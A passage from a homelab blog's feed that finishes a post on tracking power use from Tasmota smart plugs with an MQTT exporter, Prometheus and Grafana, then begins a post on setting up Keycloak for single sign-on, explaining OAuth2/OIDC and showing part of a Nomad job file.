</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Current consumption (W)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_current</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.ApparentPower</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Current (A)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_yesterday_pwr</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.Yesterday</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Yesterdays Total Power Consumption (kWh)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">counter</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_today_pwr</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.Today</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Todays Total Power Consumption (kWh)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">counter</span>
</span></span></code></pre></div><p>There are two main settings to be configured for the exporter. The first one is
the config of the MQTT broker to be scraped, our Mosquitto instance in this
case. Here I hit a little snag, shown by the &ldquo;-clear&rdquo; at the end of the
exporter&rsquo;s password secret path: I need the same password in two formats in my Vault. Once fully hashed,
to be written into the Mosquitto <code>passwd</code> file, and once in clear text, for
writing the exporter config file. I don&rsquo;t know yet how to do this better. One
possibility might be to look at the Go template language (which consul-template
uses) and see whether I can get away with storing only the plaintext password.
Then, in the template for the Mosquitto <code>passwd</code> file, I could manually hash
the password as part of writing the passwd file.</p>
<p>The <code>topic_path</code> configures which topic the exporter listens to. The <code>device_id_regex</code>
is important: It determines what ends up in the <code>sensor</code> label of the prometheus
metrics gathered. My topics look like this: <code>plugs/tasmota/tele/livingroom</code>.
So for my sensors, the part of the MQTT topic after <code>tele</code> is the label I would
like to have on the metrics.</p>
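<p>To make that a bit more concrete, this is how the regex carves up one of the full
telemetry topics (Tasmota adds a final level such as <code>SENSOR</code> to the
configured topic):</p>
<pre tabindex="0"><code>Topic:   plugs/tasmota/tele/livingroom/SENSOR
Regex:   plugs/tasmota/tele/(?P&lt;deviceid&gt;.*)/.*
Result:  deviceid = "livingroom"  =&gt;  sensor="livingroom" on the Prometheus metrics
</code></pre>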
<p>The second part of the config is the <code>metrics</code> config, where parts of the MQTT
messages are mapped to Prometheus metrics. To explain my config, let&rsquo;s look
at an example message again:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Time&#34;</span>: <span style="color:#e6db74">&#34;2023-06-08T22:01:44&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;ENERGY&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;TotalStartTime&#34;</span>: <span style="color:#e6db74">&#34;2023-02-01T21:57:12&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Total&#34;</span>: <span style="color:#ae81ff">405.918</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Yesterday&#34;</span>: <span style="color:#ae81ff">3.481</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Today&#34;</span>: <span style="color:#ae81ff">3.19</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Period&#34;</span>: <span style="color:#ae81ff">12</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Power&#34;</span>: <span style="color:#ae81ff">150</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ApparentPower&#34;</span>: <span style="color:#ae81ff">214</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ReactivePower&#34;</span>: <span style="color:#ae81ff">153</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Factor&#34;</span>: <span style="color:#ae81ff">0.7</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Voltage&#34;</span>: <span style="color:#ae81ff">233</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Current&#34;</span>: <span style="color:#ae81ff">0.918</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I don&rsquo;t care about the MQTT message&rsquo;s timestamp, so I ignore the <code>Time</code> part
of the message. The <code>ENERGY</code> object is what we&rsquo;re interested in here, and we tell
mqtt2prometheus how to interpret it. I chose to prefix all metrics extracted
from MQTT with <code>mqtt_</code> in my own setup, but that is not a requirement.
The <code>mqtt_name</code> is simply the path to the JSON object&rsquo;s property we are
interested in. For the type, it depends a bit on what the specific metric
represents. To me, all of the &ldquo;total power&rdquo; metrics (overall, current day, previous day)
are counters, as they monotonically increase throughout the day, and are then
reset at the end of the day (for the &ldquo;yesterday&rdquo; and &ldquo;current day&rdquo; metrics).</p>
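<p>Put together, the exporter then serves metrics that should look roughly like this.
The values are taken from the example message above; the exact label set may differ a
bit from what I show here:</p>
<pre tabindex="0"><code># HELP mqtt_power Current consumption (W)
# TYPE mqtt_power gauge
mqtt_power{sensor="livingroom"} 150
# HELP mqtt_total_power_kwh Total power consumption (kWh)
# TYPE mqtt_total_power_kwh counter
mqtt_total_power_kwh{sensor="livingroom"} 405.918
</code></pre>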
<p>Just for reference, the Prometheus scrape config for the MQTT exporter looks
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">job_name</span>: <span style="color:#ae81ff">mqtt-exporters</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metrics_path</span>: <span style="color:#e6db74">&#34;/metrics&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrape_interval</span>: <span style="color:#ae81ff">100s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">static_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;pwr-exporter.service.consul:9641&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metric_relabel_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">go_.*</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">process_.*</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">promhttp_.*</span>
</span></span></code></pre></div><p>The metrics relabel config simply drops a couple of metrics related to the
exporter itself which I&rsquo;m not interested in.</p>
<p>The <code>100s</code> scrape interval might also be worth a short comment: There are just
not that many MQTT messages sent out, and I don&rsquo;t really need that much precision
for my power measurements (and temperature measurements, but those will get their
own article).</p>
<h2 id="creating-a-grafana-dashboard">Creating a Grafana Dashboard</h2>
<p>I already showed off my Power measurement Grafana dashboard at the beginning
of the post. I&rsquo;ve got three panels there related to power consumption:</p>
<ol>
<li>Current power draw in Watts</li>
<li>Total power draw for today and yesterday</li>
<li>Total power consumption past week</li>
</ol>
<p>Not all of these panels are configured perfectly yet. But I still want to
show them off and also explain the Prometheus queries I used for them.</p>
<h3 id="current-power-draw-in-watts">Current power draw in Watts</h3>
<figure>
    <img loading="lazy" src="current_power_draw.png"
         alt="A screenshot of a Grafana panel. It is titled &#39;Overall current power draw&#39;. The X axis is showing time, going from 07:00 to 18:30. The Y axis shows power draw, going from 0 Watts to 180 Watts. There are three curves in the plot. The one labeled &#39;deskleft&#39; shows a constant 6W draw over the entire time-span of the plot. The curve labeled &#39;deskright&#39; fluctuates a bit, going from 8 W to 17 W occasionally. Finally, the &#39;homelab&#39; curve also shows some peaks of up to 170 W, but most of the time also fluctuates around 145 W."/> <figcaption>
            <p>The plot showing current power draw of my setup. The <code>homelab</code> curve is my entire Homelab setup, while <code>deskright</code> and <code>deskleft</code> are the power strips powering the rest of my desk, e.g. my desktop, WiFi AP etc.</p>
        </figcaption>
</figure>

<p>This is the most boring plot, from the PoV of PromQL, and at the same time the
one I look at the most. The PromQL query is just <code>mqtt_power</code>.</p>
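<p>If I ever want to slice this differently, the same metric lends itself to small
variations. These aren&rsquo;t part of the dashboard, just examples:</p>
<pre tabindex="0"><code># Current draw of a single plug
mqtt_power{sensor="homelab"}

# Combined draw of everything measured
sum(mqtt_power)
</code></pre>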
<h3 id="total-power-draw-in-kwh">Total power draw in kWh</h3>
<p>The next panel has a somewhat more complex query config. It shows the
total power draw in kWh, for all three plugs in my system, for both the current
day, and the previous day.</p>
<figure>
    <img loading="lazy" src="total_power_draw_panel.png"
         alt="A screenshot of a Grafana panel. The panel shows a bar chart, titled &#39;Total Power Draw&#39;. The X axis shows labels, from left to right: &#39;deskleft&#39;, &#39;deskright&#39; and &#39;homelab&#39;. The Y axis shows kWh consumed. For each of the labels on the X axis, there are two bars, labeled &#39;yesterday&#39; and &#39;today&#39;. For deskleft, yesterday shows 144 Wh and Today shows 109 Wh. Deskright is a bit more, with 235 Wh for yesterday and 178 Wh for today. Finally, Homelab takes the crown, with 3.48 kWh for yesterday and 2.64 kWh for today."/> <figcaption>
            <p>Total Power Draw plot. Notably, this screenshot was taken for a day where I wasn&rsquo;t home at all.</p>
        </figcaption>
</figure>

<p>As I noted, the config is a bit more interesting here. First of all, there are
two PromQL queries for this plot, one on <code>mqtt_yesterday_pwr</code> and one on
<code>mqtt_today_pwr</code>. The type of the plot is <em>bar chart</em>. The X axis is configured
to go over the <code>sensor</code> label. This label is set to the different names for my
plugs, which in turn are named for the location they&rsquo;re plugged in.</p>
<p>The problem with this plot was that I wanted the two different metrics, the
total consumption for today and yesterday, as two separate bars for each of
the labels. After some trial and error, I figured out that I can do it in
Grafana by using &ldquo;Transforms&rdquo;. I&rsquo;m using two of them. The more important one
is the <code>Join by labels</code> transform. See the Grafana docs <a href="https://grafana.com/docs/grafana/latest/panels-visualizations/query-transform-data/transform-data/">here</a>. I&rsquo;m joining
on the <code>sensor</code> label. This way, I end up with the values grouped by sensor.
Then I&rsquo;m using an <code>Organize fields</code> transform, to rename <code>mqtt_yesterday_pwr</code>
and <code>mqtt_today_pwr</code> to <code>Yesterday</code> and <code>Today</code> respectively. This makes the
labels a bit nicer.</p>
<h3 id="power-consumption-per-day-over-one-week">Power consumption per day over one week</h3>
<p>This is the one plot which does not really work as intended. The idea was to
show the values for total power draw for all three plugs per day for the past
week, to get an overview of how the consumption is developing.</p>
<figure>
    <img loading="lazy" src="power_consumption_week_panel.png"
         alt="Another bar chart, titled &#39;Total power consumption past week&#39;. On the X axis are the names of the weekdays, going from Saturday to Sunday the following week. The Y axis shows the consumed power in kWh, going from 0 to 3.5. Each day has three bars, labeled deskleft, deskright and homelab. The homelab bar is very consistent around 3.5 kWh. The deskright value consistently increases from Saturday until Wednesday, going from 2 kWh to 2.8 kWh. On Thursday, it starts falling, going down to 2 kWh on Thursday and below 0.5 kWh for Friday, Saturday and Sunday. The deskleft values are also very consistent. They hover around 0.5 kWh from Saturday to Thursday, and go down to around 0.2 kWh for the rest of the days."/> <figcaption>
            <p>Total power consumption per day over the past week. The week shown here was a vacation week for me.</p>
        </figcaption>
</figure>

<p>This plot was the most complicated one, and it still does not work right.
Having a look at the screenshot above, note how both the <code>deskleft</code> and <code>deskright</code>
plots get considerably lower starting on Friday? That&rsquo;s wrong. The week that&rsquo;s
shown here was a vacation week for me, which is why the values for deskleft
and deskright got so high - those plugs are measuring the power consumption of
my desktop machine, including screens. And on Thursday (Donnerstag), I left
very early to visit some friends and family, so I wasn&rsquo;t home at all that day.
But Thursday is still very high - which is because those bars are actually the
values for Wednesday (Mittwoch), not the ones for Thursday. So something is
still wrong in my config.</p>
<p>Still, I want to show you a little bit of what&rsquo;s going on in the Grafana config
for this particular plot.</p>
<p>First, the PromQL query:</p>
<pre tabindex="0"><code>max_over_time(mqtt_today_pwr[24h] offset -24h)
</code></pre><p>This takes each 24h long interval (meaning all data points in that interval),
and takes the maximum over it - which, because the daily value resets at
midnight, is the final value of that day. The <code>-24h</code> offset is needed to make
sure that you actually get a value from the previous day - not the current day.</p>
<p>The real &ldquo;magic&rdquo; here happens in the Grafana query options though. Here, I
configured the &ldquo;Relative time&rdquo; field to &ldquo;8d&rdquo;, which gives me the entire past
week.</p>
<p>I&rsquo;m not 100% sure which configuration is throwing the daily alignment out of
whack here.
I think something is wrong with my assumption that the 24h offset together
with <code>max_over_time</code> guarantees that I get the max value for each day.</p>
<h2 id="some-interesting-data-points">Some interesting data points</h2>
<p>Before finishing the article, I want to show off a couple of interesting plots.</p>
<p>This first one showed an interesting change: I switched off a VM, which served
as a Nomad worker, on my x86 server. The server kept running, and was at that
point still running two Ceph nodes. But it was no longer running any Nomad
workloads. All of the workloads still ran, just now on Raspberry Pis instead
of a VM on my x86 server.</p>
<figure>
    <img loading="lazy" src="power_draw_bastet.png"
         alt="A screenshot of a Grafana time series plot. It is titled &#39;Overall current power draw&#39;. The X axis shows time, going from 03.03.2023 00:00h to 09.03.2023 00:00h. The Y axis shows power consumption in Watts, going from 120W to 190W. There are a lot of spikes in the power draw line, but more importantly, the initial floor, the lowest power consumption, is around 130W, from the start to around 12:00h on 05.03. Starting then, the lowest consumption falls, and reaches a new floor around 125W, which is kept until the graph ends."/> <figcaption>
            <p>Plot showing homelab power consumption. Notably, the floor drops from 130W to 125W around March 5th.</p>
        </figcaption>
</figure>

<p>This next one mostly shows how expensive running a Gentoo desktop is. I think
I should switch to Ubuntu or something like it, for the sake of the environment. &#x1f605;</p>
<figure>
    <img loading="lazy" src="gentoo_update.png"
         alt="A screenshot of a Grafana plot titled &#39;Overall current power draw&#39;. The X axis shows time, going from 10:00 on the left to 16:30 on the right. The Y axis shows power consumption in Watts, going from zero to 400W. The plot starts out hovering around 100W until about 10:50, where it goes up to 150W. Starting at 11:30, the plot peaks up to over 350W. It only returns to below 150W for the first time again at 14:25. Then it again has three peaks up to over 250W. At around 15:15, it finally returns to hovering around 100W."/> <figcaption>
            <p>Plot showing my desktop&rsquo;s power consumption during a Gentoo Linux world update.</p>
        </figcaption>
</figure>

<p>In the same vein, gaming is also damned expensive. Here is my desktop&rsquo;s power
consumption during a night of Anno 1800. You can even see where I hit the pause
button to grab something to drink or go for a smoke.</p>
<figure>
    <img loading="lazy" src="anno_1800.png"
         alt="A screenshot of a Grafana plot, titled &#39;Overall current power draw.&#39; The X axis shows time, going from 23:30 to 03:30, while the Y axis shows power consumption in Watts, going from 0W to 325W. Until about 23:32, the plot hovers around 100W. Then it goes up to 285W. It hovers between 275W and 300W for most of the time, with small negative peaks down to around 180W for about five minutes each. The plot goes down to about 100W again at 02:10 and then down to about 10W at 02:15."/> <figcaption>
            <p>Plot showing my desktop&rsquo;s power consumption while playing Anno 1800.</p>
        </figcaption>
</figure>

<p>Another one I found interesting is the consumption while I&rsquo;m working from home.
You can even see where I got coffee or went for a smoke and Windows put my
screens in stand-by.</p>
<figure>
    <img loading="lazy" src="home_office.png"
         alt="A screenshot of a Grafana plot with the title &#39;Overall current power draw&#39;. The X axis shows time, starting with 00:00 on the left to 23:00 on the right. The Y axis shows power consumption in Watts. There are two plots, one labeled &#39;deskleft&#39; and one labeled &#39;deskright&#39;. &#39;deskright&#39; starts out at 160W, while &#39;deskleft&#39; starts at 30W. Both go down at about 00:30, to about 15W. They stay there until around 08:15. &#39;deskleft&#39; then goes up to 30W again and stays there until the end of the plot, for the most part. &#39;deskright&#39; forms a baseline around 40W until around 19:00. Then it goes up to 140W until about 20:30, when it goes down to a baseline around 100W. Both of the curves show troughs throughout the day until 19:00. In those troughs, &#39;deskleft&#39; goes down to about 10W and &#39;deskright&#39; goes down to 20W. These troughs are around 10 minutes long each. The one exception is a trough around 11:50 to 12:50."/> <figcaption>
            <p>Plot showing the power consumption during a Work from Home day.</p>
        </figcaption>
</figure>

<p>Another PoV is the daily total consumption for that week, where I was working
from home Thursday and Friday. On both days, I used approximately 430 Wh more
in electricity than on the other days, where I was working from the office.</p>
<figure>
    <img loading="lazy" src="home_office_week.png"
         alt="A screenshot of a Grafana plot, titled &#39;Total power consumption past week&#39;. The X axis shows weekdays, going from Monday to Sunday. The Y axis shows power consumption in kWh. It goes from 0 kWh to 3.5kWh. Each of the weekdays show three bars, labeled &#39;deskleft&#39;, &#39;deskright&#39; and &#39;homelab&#39;. The &#39;homelab&#39; bar is ignored here, as it is not pertinent to the figure. The &#39;deskleft&#39; bar starts out at around 250Wh from Monday to Wednesday. On Thursday, it goes to about 500Wh, ending at about 550Wh on Saturday and Sunday. The &#39;deskright&#39; bar is around 750Wh on Monday and Tuesday, and around 900Wh on Wednesday. Then it is around 1.25kWh for Thursday and Friday. On Saturday and Sunday, it is around 2.1kWh and 2.25kWh respectively."/> <figcaption>
            <p>Plot showing my power consumption during a week where I worked from home on Thursday and Friday.</p>
        </figcaption>
</figure>

<p>To be honest, this project wasn&rsquo;t very much about controlling/reducing my
power consumption. The switch to mostly Raspberry Pis for the Homelab was
planned before I ever started measuring the lab&rsquo;s power consumption. I
mostly wanted the measurements to figure out whether replacing my one x86 machine with
all of my current gear would reduce my electricity needs. It turns out it did not.</p>
<figure>
    <img loading="lazy" src="homelab_power.png"
         alt="A screenshot of a Grafana panel, titled &#39;Overall current power draw&#39;. The X axis shows time going from February 2nd to June 9th. The Y axis shows power consumption in Watts going from 0W to 190W. The plot starts out with a baseline around 130W, with occasional spikes to around 140W. It falls to a baseline of about 125W on February 20th. Again, with spikes up to 160W, it stays there until April 22nd. Then, it goes up to a new baseline of about 150W. It stays on that baseline until about April 30th, when it falls slightly to a baseline of 145W, where it stays for the rest of the plot."/> <figcaption>
            <p>Plot showing my homelab&rsquo;s power consumption from when measurements started until the time of writing this article.</p>
        </figcaption>
</figure>

<p>The sudden jump in power consumption at the end of April was when I added another x86 machine as a
Ceph host, and the slight drop shortly thereafter was when I finally switched off
my original home server.</p>
<p>Ah well, the primary goal was high availability anyway. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>SSO with Keycloak in the Homelab</title>
      <link>https://blog.mei-home.net/posts/sso/</link>
      <pubDate>Mon, 24 Apr 2023 15:03:41 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/sso/</guid>
      <description>Setting up Keycloak for SSO and 2FA with Gitea, Mastodon, Nextcloud, Grafana</description>
      <content:encoded><![CDATA[<p>I wanted to have Single Sign-On (SSO) for as many of my services as possible
for quite a while. One of the main triggers was the need for 2FA, in particular
for the services accessible externally, to improve general security of my
Homelab setup.</p>
<p>SSO means that a user only logs in once, and with a single username/password
combo, and then gets access to multiple different services with that login. The
implementation is based first on <a href="https://auth0.com/intro-to-iam/what-is-oauth-2">OAuth2</a>.
This is a HTTP based protocol which facilitates authorization between multiple
entities:</p>
<ol>
<li>The resource owner: That&rsquo;s you, the user</li>
<li>The client: This might be a website, a smartphone app, etc.</li>
<li>The resource server: This is the application which has the resources you want
to access</li>
<li>The authorization server: This is the application which grants access</li>
</ol>
<p>To be entirely honest, I&rsquo;m probably not the right guy to explain this all in
detail, as I&rsquo;m not sure I actually understand all of it. &#x1f937;</p>
<p>But let me try to give you an example of where I&rsquo;ve previously come into contact
with OAuth: Using the <a href="https://www.drone.io/">Drone CI server</a> together with
<a href="https://gitea.io/en-us/">Gitea</a>. I don&rsquo;t want to go into details about the
setup, but: Drone CI itself does not have user management. It has completely
outsourced that to Gitea. When using Drone CI, you never create a Drone CI
account.</p>
<p>Instead, you have to enable OAuth support in your Gitea instance. Gitea will
serve as both the resource server and the authorization server in the OAuth
flows, while Drone CI will be the client.
To enable Drone CI to talk to Gitea&rsquo;s API and access its resources, namely the
Git repositories stored on the instance, you first have to create client
credentials. These credentials are user specific and consist of a client ID and
a client secret.
Whenever you log in to Drone, you are redirected to Gitea to authenticate, and
then redirected back to Drone CI. Drone CI then uses the token it received from
Gitea to show your repositories.</p>
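<p>Under the hood, that redirect is just a standard OAuth2 authorization request.
Roughly, with made-up hostnames and parameter values, the browser gets sent to
something like this:</p>
<pre tabindex="0"><code>https://gitea.example.com/login/oauth/authorize
    ?client_id=drone-client-id
    &amp;redirect_uri=https://drone.example.com/login
    &amp;response_type=code
    &amp;state=some-opaque-value
</code></pre><p>After the login is confirmed on the Gitea side, the browser is sent back to the
<code>redirect_uri</code> with a short-lived code, which Drone CI then exchanges for the
actual access token.</p>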
<p>But OAuth2 only provides for <em>authorization</em> - meaning it allows a client access
to resources, but it doesn&rsquo;t have anything to do with <em>authentication</em> - which
is the process of demonstrating that a user is who they claim to be. That Gitea,
in the example above, requires a login before it hands out an access token is just
a particular behaviour of Gitea, not something OAuth2 itself mandates.</p>
<p>So for authentication, the <em>OpenID Connect</em> (OIDC) protocol has been developed.
Under the hood, it makes use of OAuth2, but it allows for authentication. It
does so through an &ldquo;OIDC Identity Provider&rdquo;. This Identity Provider (IdP) is who
authenticates you.</p>
<p>So when you log into an app with OIDC, that app forwards you to the IdP, which
will then make sure that you are really who you claim to be, e.g. with a
username/password. Then, the IdP creates a JWT (JSON Web Token) and sends your
browser back to the client with that JWT. Encoded in that JWT can be several
pieces of information, like your username and email. The client then checks the
signature on that JWT, and if it fits the IdP&rsquo;s signature, it will trust the
information in that JWT and log you in.</p>
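<p>Just to give a feel for it, the decoded payload of such a token could look
something like this. The claims and values are purely illustrative, not taken from my
setup:</p>
<pre tabindex="0"><code>{
  "iss": "https://login.example.com/realms/myrealm",
  "sub": "a1b2c3d4-1111-2222-3333-444455556666",
  "aud": "grafana",
  "exp": 1682346000,
  "preferred_username": "some-user",
  "email": "some-user@example.com"
}
</code></pre>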
<p>As a side note, there is at least one more protocol I know about which can be
used for SSO: SAML. But OIDC is better supported at this point, so it is what
I chose.</p>
<h2 id="the-identity-provider">The identity provider</h2>
<p>The heart of an SSO setup is the Identity Provider, the service which allows
you to prove that you are you.</p>
<p>There are a number of implementations of the IdP spec. Most interesting are
probably the Open Source variants, like <a href="https://goauthentik.io/">Authentik</a>,
<a href="https://www.keycloak.org/">Keycloak</a> or <a href="https://www.vaultproject.io/">HashiCorp Vault</a>.
But there are also a large number of SaaS offerings. They get hacked from time
to time.</p>
<p>For myself, the decision was mostly between Authentik and Keycloak. I also
considered Vault for a while, as I&rsquo;ve already got a Vault cluster up and running
anyway. But I didn&rsquo;t feel comfortable with having my main secrets store
accessible on the public internet. See below for more details on Vault as an
OIDC provider.</p>
<p>So then there&rsquo;s only Authentik vs Keycloak left. And here I finally went with
the good old &ldquo;Argument from authority&rdquo;. Keycloak is developed and used/sold by
Red Hat. I&rsquo;ve got a relatively high level of trust in Red Hat. Not so for
Authentik. Don&rsquo;t get me wrong, they are most likely fine - but nobody ever got
fired for buying/deploying IBM, right? &#x1f609;</p>
<h3 id="deploying-keycloak">Deploying Keycloak</h3>
<p>I deployed Keycloak as a Nomad job in my cluster, and put it behind my
Traefik proxy.</p>
<p>The job file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;keycloak&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;mydatacenter&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  priority <span style="color:#f92672">=</span> <span style="color:#ae81ff">70</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;keycloak&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;health&#34;</span> {
</span></span><span style="display:flex;"><span>        host_network <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>        to           <span style="color:#f92672">=</span> <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;keycloak&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {
</span></span><span style="display:flex;"><span>          <span style="color:#66d9ef">proxy</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">upstreams</span> {
</span></span><span style="display:flex;"><span>              destination_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;postgres&#34;</span>
</span></span><span style="display:flex;"><span>              local_bind_port <span style="color:#f92672">=</span> <span style="color:#ae81ff">5577</span>
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>          }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.consulcatalog.connect<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.keycloak-internal.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">myentry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.keycloak-internal.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">login</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.keycloak-external.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">myexternalentry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.keycloak-external.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">login</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>) <span style="color:#960050;background-color:#1e0010">&amp;&amp;</span> <span style="color:#66d9ef">PathPrefix</span>(<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">js</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">realms</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">myrealm</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span style="color:#66d9ef">resources</span><span style="color:#960050;background-color:#1e0010">/`</span>,<span style="color:#960050;background-color:#1e0010">`/</span><span 